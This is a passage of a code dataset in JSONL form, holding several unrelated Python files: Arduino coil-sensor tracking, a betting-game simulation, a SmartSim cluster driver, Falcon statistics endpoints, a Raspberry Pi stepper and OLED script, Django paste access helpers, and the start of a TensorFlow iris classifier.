#Gives a tree representation of the decision tree decision parameters. \n os.environ[\"PATH\"] += os.pathsep + 'C:\\\\Program Files (x86)\\\\Graphviz2.38\\\\bin\\\\'\n dot_data = tree.export_graphviz(clf1, out_file=None) \n graph = pydotplus.graph_from_dot_data(dot_data) \n graph.write_pdf(\"carClassifier.pdf\") \n\n #The graphing portion of this is not working 100% currently\n feat_labels = ['m','sf','mx','mi','sdev','amin','smin','stmin','apeak','speak','stpeak','acep','scep','stcep','aacep','sscep','stsscep','zcc','zccn','spread','skewness','savss','mavss']\n\n forest = RandomForestClassifier(n_estimators=10000,random_state=0,n_jobs=1)\n forest.fit(X_train,y_train)\n importances = forest.feature_importances_\n\n indices = np.argsort(importances)[::-1]\n\n for f in range(X_train.shape[1]):\n print(\"%2d) %-*s %f\" % (f + 1, 30, \n feat_labels[indices[f]], \n importances[indices[f]]))\n\n plt.title('Feature Importances')\n plt.bar(range(X_train.shape[1]), \n importances[indices],\n color='lightblue', \n align='center')\n for f in range(X_train.shape[1]):\n plt.xticks(range(X_train.shape[1]), \n feat_labels[indices], rotation=90)\n plt.xlim([-1, X_train.shape[1]])\n plt.tight_layout()\n #plt.savefig('./random_forest.png', dpi=300)\n plt.show()\n \"\"\"\n\n\ndef collectData():\n try:\n path = 'C:\\\\Users\\\\Sara Srivastav\\\\Documents\\\\senior design\\\\3Dtracking\\\\python\\\\data'\\\n #path = 'C:\\\\Users\\\\Gersemi\\\\Desktop\\\\Github\\\\3Dtracking\\\\data\\\\'\n #ser = Serial.serial\n \n numsamples = 100\n coil1arr=[]\n coil2arr=[]\n coil3arr=[]\n coil4arr=[]\n o = '90'\n x = '1'\n y = '1'\n z = '5'\n \n dataFolder = path + \"\\\\cord_%s_%s_%s_%s\" % (o, x, y, z)\n if not os.path.exists(dataFolder):\n os.makedirs(dataFolder)\n \n for i in range(numsamples):\n dataFile = \"%s.txt\" % (datetime.utcnow().strftime('%Y%m%d_%H%M%S%f')[:-3])\n for i in range(10):\n reading = ard.readline().decode(\"utf-8\")\n if 'coil1' in reading:\n coil1 = reading\n coil1arr.append(float(coil1[5:]))\n #print(coil1)\n elif 'coil2' in reading:\n coil2 = reading\n coil2arr.append(float(coil2[5:]))\n #print(coil2)\n elif 'coil3' in reading:\n coil3 = reading\n coil3arr.append(float(coil3[5:]))\n #print(coil3)\n elif 'coil4' in reading:\n coil4 = reading\n coil4arr.append(float(coil4[5:]))\n #print(coil4)\n #print('1: \"%s\", 2: \"%s\", 3: \"%s\", 4: \"%s\"' % (coil1, coil2, coil3, coil4))\n\n #print(coil1arr,coil2arr,coil3arr,coil4arr) \n featuresC1 = get_indicators(coil1arr)\n featuresC2 = get_indicators(coil2arr)\n featuresC3 = get_indicators(coil3arr)\n featuresC4 = get_indicators(coil4arr)\n print(\"C1: \")\n print(featuresC1)\n print(\"C2: \")\n print(featuresC2)\n print(\"C3: \")\n print(featuresC3)\n print(\"C4: \")\n print(featuresC4)\n features = []\n features.extend(featuresC1)\n features.extend(featuresC2)\n features.extend(featuresC3)\n features.extend(featuresC4)\n #print(features)\n f = open(dataFolder + \"\\\\\"+ dataFile, 'w')\n f.write(str(features))\n f.close()\n f = open(path + \"\\\\signal_cord_%s_%s_%s_%s_\" % (o,x, y, z) + dataFile, 'w')\n f.write(str(coil1arr))\n f.write(str(coil2arr))\n f.write(str(coil3arr))\n f.write(str(coil4arr))\n f.close()\n except Exception as exc:\n print(exc)\n ard.close()\n\n print('done') \n\ndef get_indicators(vec):\n '''\n Source: https://github.com/VikParuchuri/simpsons-scripts\n '''\n mean = np.mean(vec)\n slope = calc_slope(np.arange(len(vec)),vec)\n #std = np.std(vec)\n mx = np.max(vec)\n mi = np.min(vec)\n sdev = np.std(vec)\n return [mean, slope, mx, 
mi, sdev]\n\ndef calc_slope(x,y):\n '''\n Source: https://github.com/VikParuchuri/simpsons-scripts\n '''\n x_mean = np.mean(x)\n y_mean = np.mean(y)\n x_dev = np.sum(np.abs(np.subtract(x,x_mean)))\n y_dev = np.sum(np.abs(np.subtract(y,y_mean)))\n\n slope = (x_dev*y_dev)/(x_dev*x_dev)\n return slope\n\ndef connectArduino():\n if ard.is_open:\n ard.close()\n arduinoPorts = [\n p.device\n for p in serial.tools.list_ports.comports()\n if 'USB-SERIAL CH340' in p.description\n ]\n if not arduinoPorts:\n raise IOError(\"No Arduino found\")\n if len(arduinoPorts) > 1:\n warnings.warn('Multiple Arduinos found - using the first')\n ard.port = arduinoPorts[0]\n ard.open()\n\ndef printCoilDataTagged():\n try:\n connectArduino()\n while True:\n reading = list(ard.readline())\n print(reading)\n tag = reading[0:4]\n value = reading[5:]\n print('\"%s\": \"%s\"' % (tag, reading))\n \n except Exception as exc:\n print('Exception: \"%s\"' % exc)\n\ndef printCoilData():\n try:\n\n connectArduino()\n while True:\n for i in range(4):\n reading = ard.readline()\n coilReading = reading.replace('coil'+str(i), '')\n print('Coil\"%s\" reading: \"%s\"' % (i,float(coilReading)))\n\n except Exception as exc:\n print('Exception: \"%s\"' % exc)\n\nclass TrackingGui(QWidget):\n\n def __init__(self):\n super().__init__()\n\n #Coordinate box setup\n xlabel = QLabel('X:', self) \n xlabel.setMaximumWidth(40)\n ylabel = QLabel('Y:', self) \n ylabel.setMaximumWidth(40)\n zlabel = QLabel('Z:', self)\n zlabel.setMaximumWidth(40)\n\n self.xline = QLineEdit('')\n self.xline.setReadOnly(True)\n self.yline = QLineEdit('')\n self.yline.setReadOnly(True)\n self.zline = QLineEdit('')\n self.zline.setReadOnly(True)\n \n #Plot setup\n # a figure instance to plot on\n self.figure = Figure()\n\n # this is the Canvas Widget that displays the `figure`\n # it takes the `figure` instance as a parameter to __init__\n self.canvas = FigureCanvas(self.figure)\n #self.fig = plt.figure()\n self.ax = self.figure.add_subplot(111, projection='3d')\n \n #Placing objects onto the GUI\n grid = QGridLayout()\n grid.setSpacing(10)\n\n grid.addWidget(xlabel, 0, 0)\n grid.addWidget(self.xline, 0, 1)\n\n grid.addWidget(ylabel, 1, 0)\n grid.addWidget(self.yline, 1, 1)\n \n grid.addWidget(zlabel, 2, 0)\n grid.addWidget(self.zline, 2, 1)\n \n grid.columnStretch(0)\n\n vbox = QVBoxLayout()\n vbox.addWidget(self.canvas)\n vbox.addStretch(1)\n\n hbox = QHBoxLayout()\n hbox.addLayout(grid, 0)\n hbox.addLayout(vbox, 1)\n\n self.setLayout(hbox)\n self.setGeometry(1000, 700, 1000, 700)\n self.setWindowTitle('3D Tracking GUI')\n self.center()\n self.show()\n\n timer = QTimer(self)\n timer.timeout.connect(self.updatePlot)\n timer.start(20)\n \n def updatePlot(self):\n try:\n ''' plot some random stuff '''\n #x, y, z = classifyData()\n cord = classifyData()\n x = cord[0]\n y = cord[1]\n z = cord[2]\n #x = random.uniform(0.0,30.0)\n #y = random.uniform(0.0,20.0)\n #z = random.uniform(0.0,10.0)\n \n self.xline.setText(str(round(x,2))+' cm')\n self.yline.setText(str(round(y,2))+' cm')\n self.zline.setText(str(round(z,2))+' cm')\n \n # create an axis\n #ax = self.figure.add_subplot(111, projection='3d')\n\n # discards the old graph\n self.ax.clear()\n\n # plot data\n self.ax.set_xlim(0, 30, 5)\n #self.ax.set_ylim(0, 20, 5)\n self.ax.set_ylim(0, 30, 5)\n self.ax.set_zlim(0, 10, 2)\n self.ax.scatter(x, y, z, 'gray')\n\n # refresh canvas\n self.canvas.draw()\n except Exception as exc:\n print('Exception: \"%s\"' % exc)\n \n def center(self):\n qr = self.frameGeometry()\n cp = 
QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\ndef classifyData():\n try:\n coil1arr=[]\n coil2arr=[]\n coil3arr=[]\n coil4arr=[]\n numsamples = 100 \n for i in range(numsamples):\n reading = ard.readline().decode(\"utf-8\")\n if 'coil1' in reading:\n coil1 = reading\n coil1arr.append(float(coil1[5:]))\n #print(\"coil1\")\n #print(coil1)\n elif 'coil2' in reading:\n coil2 = reading\n coil2arr.append(float(coil2[5:]))\n #print(\"coil2\")\n #print(coil2)\n elif 'coil3' in reading:\n coil3 = reading\n coil3arr.append(float(coil3[5:]))\n #print(\"coil3\")\n #print(coil3)\n elif 'coil4' in reading:\n coil4 = reading\n coil4arr.append(float(coil4[5:]))\n #print(\"coil4\")\n #print(coil4)\n #print('1: \"%s\", 2: \"%s\", 3: \"%s\", 4: \"%s\"' % (coil1, coil2, coil3, coil4))\n #print(coil1arr,coil2arr,coil3arr,coil4arr)\n \n featuresC1 = get_indicators(coil1arr)\n print(\"coil1\")\n print(featuresC1)\n featuresC2 = get_indicators(coil2arr)\n print(\"coil2\")\n print(featuresC2)\n featuresC3 = get_indicators(coil3arr)\n print(\"coil3\")\n print(featuresC3)\n featuresC4 = get_indicators(coil4arr)\n print(\"coil4\")\n print(featuresC4)\n features = []\n features.extend(featuresC1)\n features.extend(featuresC2)\n features.extend(featuresC3)\n features.extend(featuresC4)\n\n \"\"\" \n prediction = clf0.predict([feature])\n \n coordinates = prediction[0].split(\"_\")\n orien = coordinates[1]\n x = int(coordinates[2])\n y = int(coordinates[3])\n z = int(coordinates[4])\n return [x,y,z]\n print((\"x:%s, y:%s, z:%s\") % (x,y,z))\n \"\"\" \n \n except Exception as exc:\n print('Exception: \"%s\"' % exc)\n\nclf0 = joblib.load('svm-SVCALL.pkl')\nclf1 = joblib.load('svm-SVC0deg.pkl')\nclf2 = joblib.load('svm-SVC0-90deg.pkl')\nif __name__ == '__main__':\n \n try:\n try:\n connectArduino()\n except:\n print('No Arduino')\n #collectData()\n #standarizeData()\n #trainClassifier()\n classifyData()\n #app = QApplication(sys.argv)\n #ex = TrackingGui()\n #sys.exit(app.exec_())\n except KeyboardInterrupt:\n pass\n","sub_path":"python/copydoeverything.py","file_name":"copydoeverything.py","file_ext":"py","file_size_in_byte":17763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2927749","text":"import random\n\nmoney = 100\n\n#Write your game of chance functions here\n\n#Flips coin and returns winnings or losses\ndef coin_flip(guess, bet):\n print('Flipping a coin...\\n')\n one_or_two = random.randint(1, 2)\n \n if one_or_two == 1:\n coin = 'Heads'\n elif one_or_two == 2:\n coin = 'Tails'\n \n print(f'You called {guess} and bet £{str(bet)}...\\n')\n print(f'The coin landed on {coin}.\\n')\n \n if guess == coin:\n print(f'You won £{str(bet)}!\\n')\n return bet\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n \n \n#Rolls two dice and lets player guess if total is odd or even\ndef cho_han(guess, bet):\n print('Rolling two dice...\\n')\n roll_one = random.randint(1, 6)\n print(f'The first dice rolled a {str(roll_one)}\\n')\n roll_two = random.randint(1, 6)\n print(f'The second dice rolled a {str(roll_two)}\\n')\n total = roll_one + roll_two\n \n if total % 2 == 0:\n result = 'Even'\n else:\n result = 'Odd'\n \n print(f'You guessed {guess} and bet £{str(bet)}...\\n')\n print(f'The dice totaled {str(total)}, an {result} number!\\n')\n \n if guess == result:\n print(f'You won £{str(bet)}!\\n')\n return bet\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n \n#Simulates two cards being drawn from a deck, 
highest wins\ndef two_card_draw(bet):\n print('Drawing two cards...\\n')\n print(f'You bet £{str(bet)}...\\n')\n deck = []\n for i in range(2, 15):\n deck.append(i)\n deck.append(i)\n deck.append(i)\n deck.append(i)\n \n player_card_num = deck[random.randint(0, 51)]\n deck.remove(player_card_num)\n opponent_card_num = deck[random.randint(0, 50)]\n \n player_card = card_number_to_name(player_card_num)\n opponent_card = card_number_to_name(opponent_card_num)\n \n print(f'You drew a(n) {str(player_card)}\\n')\n print(f'Your opponent drew a(n) {str(opponent_card)}\\n')\n \n if player_card_num == opponent_card_num:\n print('It\\'s a draw!\\n')\n return 0\n elif player_card_num > opponent_card_num:\n print(f'You won £{str(bet)}!\\n')\n return bet\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n \n#Converts number to picture card name for card draw game\ndef card_number_to_name(card_number):\n if card_number == 14:\n return 'Ace'\n elif card_number == 11:\n return 'Jack'\n elif card_number == 12:\n return 'Queen'\n elif card_number == 13:\n return 'King'\n else:\n return card_number\n \n#Roulette - guess a number or odd/even and returns winnings/losses\ndef roulette(guess, bet):\n print('Spinning the roulette wheel...\\n')\n result = random.randint(0, 36)\n \n if result % 2 == 0:\n odd_or_even = 'Even'\n else:\n odd_or_even = 'Odd'\n \n print('The wheel is spinning...\\n')\n print(f'It landed on a {str(result)}!\\n')\n \n if guess == 'Odd' or guess == 'Even':\n print(f'You guessed {guess} and bet £{str(bet)}...\\n')\n if guess == odd_or_even:\n print(f'You won £{str(bet)}!\\n')\n return bet\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n else:\n print(f'You guessed {str(guess)} and bet £{str(bet)}...\\n')\n if guess == result:\n print(f'You won £{str(bet * 35)}!\\n')\n return bet * 35\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n \n \n \n \n#Call your game of chance functions here\n\nmoney += coin_flip('Heads', 10)\n\nprint(f'£{money} left\\n')\n\nmoney += cho_han('Odd', 20)\n\nprint(f'£{money} left\\n')\n\nmoney += two_card_draw(15)\n\nprint(f'£{money} left\\n')\n\nmoney += roulette(7, 10)\n\nprint(f'£{money} left\\n')\n\nmoney += roulette('Odd', 30)\n\nprint(f'£{money} left\\n')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"games-of-chance/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"562421529","text":"# general imports\nimport os\nimport sys\n\n# smartsim and smartredis imports\nfrom smartsim import Experiment\nfrom smartsim.settings import MpiexecSettings\n\n# Define function to parse node list\ndef parseNodeList(fname):\n with open(fname) as file:\n nodelist = file.readlines()\n nodelist = [line.rstrip() for line in nodelist]\n nodelist = [line.split('.')[0] for line in nodelist]\n nNodes = len(nodelist)\n return nodelist, nNodes\n\n# Parse command line arguments\nnodes = int(sys.argv[1])\ndb_nNodes = int(sys.argv[2])\nsim_nNodes = int(sys.argv[3])\nml_nNodes = int(sys.argv[4])\nppn = int(sys.argv[5])\nsimprocs = int(sys.argv[6])\nsimprocs_pn = int(sys.argv[7])\nmlprocs = int(sys.argv[8])\nmlprocs_pn = int(sys.argv[9])\ndevice = sys.argv[10]\nlogging = sys.argv[11]\nhostfile = sys.argv[12]\n\n# Get nodes of this allocation (job) and split them between the tasks\nnodelist, nNodes = parseNodeList(hostfile)\nprint(f\"\\nRunning on {nNodes} total nodes on Polaris\")\nprint(nodelist, \"\\n\")\ndbNodes = 
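Editor's sketch, a hypothetical simulation: the single-number roulette() bet above pays 35:1 but wins with probability 1/37, so the expected value is about -1/37 per unit staked; a quick Monte Carlo check of that claim.

import random

random.seed(0)
trials, bet, net = 100_000, 1, 0
for _ in range(trials):
    if random.randint(0, 36) == 7:  # single-number bet on 7
        net += bet * 35
    else:
        net -= bet
print(net / trials)  # roughly -0.027 (about -1/37)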
','.join(nodelist[0: db_nNodes])\ndbNodes_list = nodelist[0: db_nNodes]\nsimNodes = ','.join(nodelist[db_nNodes: db_nNodes + sim_nNodes])\nmlNodes = ','.join(nodelist[db_nNodes + sim_nNodes: db_nNodes + sim_nNodes + ml_nNodes])\nprint(f\"Database running on {db_nNodes} nodes:\")\nprint(dbNodes)\nprint(f\"Simulatiom running on {sim_nNodes} nodes:\")\nprint(simNodes)\nprint(f\"ML running on {ml_nNodes} nodes:\")\nprint(mlNodes, \"\\n\")\n\n# Set up database and start it\nPORT = 6780\nexp = Experiment(\"train-example\", launcher=\"pbs\")\nrunArgs = {\"np\": 1, \"ppn\": ppn, \n #\"hosts\": dbNodes\n }\ndb = exp.create_database(port=PORT, batch=False, db_nodes=db_nNodes,\n run_command='mpiexec',\n interface='hsn0', \n hosts=dbNodes_list,\n run_args=runArgs,\n single_cmd=False\n )\nexp.generate(db)\nprint(\"Starting database ...\")\nexp.start(db)\nprint(\"Done\\n\")\n\n# Python data producer\nprint(\"Launching Python data producer ...\")\nPy_exe = 'src/load_data.py'\nif (simprocs_pn>ppn):\n simprocs_pn = ppn\nexe_args = Py_exe + f' --dbnodes {db_nNodes} --ppn {simprocs_pn} --logging {logging}'\nrunArgs = {\"np\": simprocs, \"ppn\": simprocs_pn, \n \"hosts\": simNodes\n }\nrun_settings = MpiexecSettings('python',\n exe_args=exe_args, \n run_args=runArgs\n )\nsim_exp = exp.create_model(\"load_data\", run_settings)\nexp.start(sim_exp, summary=True, block=False)\nprint(\"Done\\n\")\n\n# Python data consumer\nprint(\"Launching Pyhton data consumer ...\")\nml_exe = \"src/trainPar.py\"\nif (mlprocs_pn>ppn):\n mlprocs_pn = ppn\nexe_args = ml_exe + f' --dbnodes {db_nNodes} --device {device} --ppn {mlprocs_pn} --logging {logging}'\nrunArgs = {\"np\": mlprocs, \"ppn\": mlprocs_pn, \n \"hosts\": mlNodes\n }\nrunML_settings = MpiexecSettings('python',\n exe_args=exe_args, \n run_args=runArgs\n )\nml_exp = exp.create_model(\"train_model\", runML_settings)\nexp.start(ml_exp, summary=True, block=True)\nprint(\"Done\\n\")\n\n# Stop database\nprint(\"Stopping the Orchestrator ...\")\nexp.stop(db)\nprint(\"Done\")\nprint(\"Quitting\")\n\n","sub_path":"couplingSimulationML/SmartSim/Polaris/Python/train_clDB/src/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"646538962","text":"from io import BytesIO\nimport json\n\nimport falcon\nimport peewee\nimport unicodecsv as csv\n\nfrom playhouse.shortcuts import model_to_dict, cast\n\nfrom models import models_api\nfrom models import models_stats\nfrom utils.myjson import JSONEncoderPlus\n\n\nclass StatsItem(object):\n\n @models_stats.database.atomic()\n def on_get(self, req, resp, datatype=None):\n\n if datatype == '0':\n\n stats = models_stats.Sumario.select().first()\n\n response = model_to_dict(stats)\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus, sort_keys=True)\n\n elif datatype == '1':\n\n gasto_organismos = models_stats.MinisterioOrganismoMonto.select(\n models_stats.MinisterioOrganismoMonto.nombre_ministerio.concat('-').concat(models_stats.MinisterioOrganismoMonto.nombre_organismo).alias('nombre'),\n cast(models_stats.MinisterioOrganismoMonto.monto, 'bigint').alias('monto')\n ).order_by(\n peewee.SQL('nombre')\n )\n\n output = BytesIO()\n csvwriter = csv.writer(output, encoding='utf-8')\n\n for go in gasto_organismos.tuples():\n csvwriter.writerow(go if len(go) == 4 else go+('null', 'null'))\n\n resp.content_type = 'text/csv'\n output.seek(0)\n resp.stream = output\n\n else:\n raise falcon.HTTPNotFound()\n\n\nclass 
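Editor's sketch on a fabricated nodelist: the driver above partitions one PBS node list into database, simulation, and ML slices by index arithmetic; the same slicing stands alone like this.

nodelist = [f"nid{i:04d}" for i in range(8)]
db_nNodes, sim_nNodes, ml_nNodes = 2, 4, 2
dbNodes = nodelist[0:db_nNodes]
simNodes = nodelist[db_nNodes:db_nNodes + sim_nNodes]
mlNodes = nodelist[db_nNodes + sim_nNodes:db_nNodes + sim_nNodes + ml_nNodes]
print(dbNodes, simNodes, mlNodes)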
StatsTop(object):\n\n @models_api.database.atomic()\n def on_get(self, req, resp, datatype=None):\n\n if datatype in ['licitacion', 'licitaciones']:\n\n licitaciones = models_api.LicitacionesCategorias.select().order_by(models_api.LicitacionesCategorias.monto.desc())\n\n response = {\n 'licitaciones': [\n {\n 'id': licitacion['licitacion'],\n 'codigo': licitacion['codigo_licitacion'],\n 'nombre': licitacion['nombre_licitacion'],\n 'monto': int(licitacion['monto'])\n }\n for licitacion in licitaciones.dicts().iterator()]\n }\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus)\n\n elif datatype in ['organismo', 'organismos']:\n\n organismos = models_api.RankingOrganismos.select().order_by(models_api.RankingOrganismos.monto.desc())\n\n response = {\n 'organismos': [\n {\n 'id': organismo['organismo'],\n 'nombre': organismo['nombre_organismo'],\n 'monto': int(organismo['monto'])\n }\n for organismo in organismos.dicts().iterator()]\n }\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus)\n\n elif datatype in ['proveedor', 'proveedores']:\n\n proveedores = models_api.RankingProveedores.select().order_by(models_api.RankingProveedores.monto.desc())\n\n response = {\n 'proveedores': [\n {\n 'id': proveedor['empresa'],\n 'nombre': proveedor['nombre_empresa'],\n 'rut': proveedor['rut_sucursal'],\n 'monto': int(proveedor['monto'])\n }\n for proveedor in proveedores.dicts().iterator()]\n }\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus)\n\n elif datatype in ['categoria', 'categorias']:\n\n categorias = models_api.RankingCategorias.select().order_by(models_api.RankingCategorias.monto.desc())\n\n response = {\n 'categorias': [\n {\n 'id': categoria['id_categoria_nivel3'],\n 'nombre': categoria['categoria_nivel3'],\n 'monto': int(categoria['monto'])\n }\n for categoria in categorias.dicts().iterator()]\n }\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus)\n","sub_path":"endpoints/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"15653314","text":"import Adafruit_SSD1306\nfrom PIL import Image, ImageDraw, ImageFont\nimport RPi.GPIO as GPIO\nfrom time import sleep\n\nclk = 17 #Encoder clk pin\ndt = 18 #Encoder dt pin\nsw=6 #Encoder Switch/Select\nDIR = 21 # Direction GPIO Pin\nSTEP = 20 # Step GPIO Pin\nCW = 1 # Clockwise Rotation\nCCW = 0 # Counterclockwise Rotation\nSPR = 200 # Steps per Revolution (360 / 7.5)\n\n\n\npaused=False\npart=\"Wrist\"\n\n#Initalizing GPIO's of Encoder\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(clk, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(dt, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(sw,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n\n#Initalizing GPIO's of Stepper\nGPIO.setwarnings(False)\nGPIO.setup(DIR, GPIO.OUT)\nGPIO.setup(STEP, GPIO.OUT)\nGPIO.output(DIR, CW)\n\n#Initializing Microstep Mode pins and Table\nMODE = (26, 19, 13) # Microstep Resolution GPIO Pins\nGPIO.setup(MODE, GPIO.OUT)\nRESOLUTION = {'Full': (0, 0, 0),\n 'Half': (1, 0, 0),\n '1/4': (0, 1, 0),\n '1/8': (1, 1, 0),\n '1/16': (0, 0, 1),\n '1/32': (1, 1, 1)}\nGPIO.output(MODE, RESOLUTION['1/8'])\nstep_count = SPR*400 #How long loop should last\ndelay = .0208/2000 #350 is the fastest\n\n#Encoder check states\ncounter=0\nclkLastState = GPIO.input(clk)\ndtLastState=GPIO.input(dt)\nswLastState=GPIO.input(sw)\n\n\n#home screen of OLED display\ndisplay = 
Adafruit_SSD1306.SSD1306_128_64(rst=None)\ndisplay.begin()\ndisplay.clear()\ndisplay.display()\ndisplayWidth=display.width\ndisplayHeight=display.height\nimage=Image.new('1',(displayWidth,displayHeight))\ndraw=ImageDraw.Draw(image)\nfont=ImageFont.load_default()\ndisplay.clear()\ndisplay.display()\nconverted_count=str(counter)\ndraw.text((0,0),\"Welcome to 5ARA \\n Created by: \\n Nicholas Ruiz \\n Brent Holzhauer \\n Mathew Olajide\",font=font,fill=255)\ndisplay.image(image)\ndisplay.display()\n\ndef clockwise(stepper,speed,loop):\n for x in range(speed):\n GPIO.output(stepper,GPIO.HIGH)\n sleep(loop)\n GPIO.output(stepper,GPIO.LOW)\n sleep(loop)\n return\n#interrupt for + counting \ndef clkClicked(channel):\n global counter\n clkState=GPIO.input(clk)\n dtState = GPIO.input(dt)\n \n if clkState ==0 and dtState ==1:\n counter +=1\n print(counter)\n display.begin()\n display.clear()\n display.display()\n displayWidth=display.width\n displayHeight=display.height\n image=Image.new('1',(displayWidth,displayHeight))\n draw=ImageDraw.Draw(image)\n font=ImageFont.load_default()\n converted_count=str(counter)\n draw.text((0,0),\"Selected Stepper #\" + converted_count,font=font,fill=255)\n draw.text((0,10),\"RPM \\n\" + converted_count,font=font,fill=255)\n display.image(image)\n display.display()\n \n#interrupt for -counter \ndef dtClicked(channel):\n global counter\n \n clkState =GPIO.input(clk)\n dtState=GPIO.input(dt)\n if clkState ==1 and dtState ==0:\n counter -=1\n print(counter)\n display.begin()\n display.clear()\n display.display()\n displayWidth=display.width\n displayHeight=display.height\n image=Image.new('1',(displayWidth,displayHeight))\n draw=ImageDraw.Draw(image)\n font=ImageFont.load_default()\n converted_count=str(counter)\n draw.text((0,0),\"Selected Stepper #\" + converted_count,font=font,fill=255)\n draw.text((0,10),\"RPM \\n\" + converted_count,font=font,fill=255)\n display.image(image)\n display.display()\n\n#interrupt for selected button \ndef swClicked(channel):\n global paused\n paused = not paused\n convert_paused=str(paused)\n print(paused)\n display.begin()\n display.clear()\n display.display()\n displayWidth=display.width\n displayHeight=display.height\n image=Image.new('1',(displayWidth,displayHeight))\n draw=ImageDraw.Draw(image)\n font=ImageFont.load_default()\n converted_count=str(counter)\n draw.text((0,0),\"Selected Stepper #\" + converted_count,font=font,fill=255)\n draw.text((0,10),\"RPM:\" + converted_count,font=font,fill=255)\n draw.text((0,30),\"Beginning Arm Movement \\n\" + part,font=font,fill=255)\n display.image(image)\n display.display()\n if (counter == 3):\n clockwise(20,10000000,.0208/2000)\n if (counter == 6):\n clockwise(20,1000000, .0208/2000)\n\n#call interrupts with certain delay \nGPIO.add_event_detect(clk,GPIO.FALLING,callback=clkClicked,bouncetime=100)\nGPIO.add_event_detect(dt,GPIO.FALLING,callback=dtClicked,bouncetime=100)\nGPIO.add_event_detect(sw,GPIO.FALLING,callback=swClicked,bouncetime=100)\n\n#send to command line \nraw_input(\"Welcome to 5ARA \\n\")\n\n#if statement that intializes movement based on counter\nraw_input(counter)\n\n\n\n \n\n","sub_path":"Adafruit_Python_SSD1306/examples/encoderinterruptwithswitch.py","file_name":"encoderinterruptwithswitch.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"311236787","text":"def is_paste_owner(request, paste):\n\tif paste.identifier not in request.session.get(\"pastes\", []) and 
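Editor's sketch, no GPIO required: the clk/dt interrupt handlers above infer rotation direction from the pin pair (clk low while dt is high increments the counter, the mirror case decrements); the same rule as a pure function, where step() is a hypothetical name.

def step(clk_state, dt_state):
    if clk_state == 0 and dt_state == 1:
        return +1  # clkClicked() path
    if clk_state == 1 and dt_state == 0:
        return -1  # dtClicked() path
    return 0

counter = 0
for clk_s, dt_s in [(0, 1), (0, 1), (1, 0)]:
    counter += step(clk_s, dt_s)
print(counter)  # 1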
paste.user != request.user:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef is_paste_reader(request, paste, key):\n\tif is_paste_owner(request, paste):\n\t\treturn True\n\ttry:\n\t\tacl = paste.pasteacl_set.get(identifier=key)\n\texcept:\n\t\treturn False\n\tif acl.is_expired:\n\t\treturn False\n\tif acl.ip:\n\t\tif acl.ip != request.META.get(\"REMOTE_ADDR\"):\n\t\t\treturn False\n\telse:\n\t\tacl.ip = request.META.get(\"REMOTE_ADDR\")\n\t\tacl.save()\n\treturn True","sub_path":"light/api/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"179294574","text":"import tensorflow as tf\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# ------ Load and split the data ------\niris = load_iris()\niris_X = iris['data']\niris_y = pd.get_dummies(iris['target']) # One-hot encoding using Pandas\ntrain_X, test_X, train_Y, test_Y = train_test_split(iris_X,\n iris_y,\n test_size=0.3333,\n random_state=3437)\n\n# Create placeholders for passing data around the network\nnum_features = train_X.shape[1] # Second dimension of train_X\nnum_labels = train_Y.shape[1] # Second dimension of one-hot encoded labels.\n\nX = tf.compat.v1.placeholder(tf.float32, shape=(None, num_features))\nY_correct = tf.compat.v1.placeholder(tf.float32, shape=(None, num_labels))\n\n# Create weights and bias variables\nweights = tf.Variable(tf.random.normal((num_features, num_labels)))\nbiases = tf.Variable(tf.random.normal((num_labels,)))\n\n# Operations for logistic regression\n# 1. Multiply X by weights\n# 2. Add bias to product\n# 3. Apply sigmoid function to sum\nmult_op = tf.matmul(X, weights)\nadd_op = tf.add(mult_op, biases)\nsigmoid_op = tf.sigmoid(add_op)\n\n# Setting up learning duration (no. 
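In the paste-ACL record above, is_paste_reader wraps the ACL lookup in a bare except:, which also swallows programming errors; the usual Django idiom is to catch the model's DoesNotExist (presumably PasteACL.DoesNotExist, inferred from pasteacl_set). The ownership condition itself reduces to "in session OR same user" — a framework-free sketch so the logic is testable in isolation (the arguments are stand-ins for the session list and user objects):

def is_owner(session_pastes, session_user, paste_id, paste_user):
    """Owner if the paste id is in the session's pastes OR the users match."""
    return paste_id in session_pastes or paste_user == session_user

assert is_owner(["abc"], "alice", "abc", "bob") is True   # via session
assert is_owner([], "alice", "abc", "alice") is True      # via user
assert is_owner([], "alice", "abc", "bob") is False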
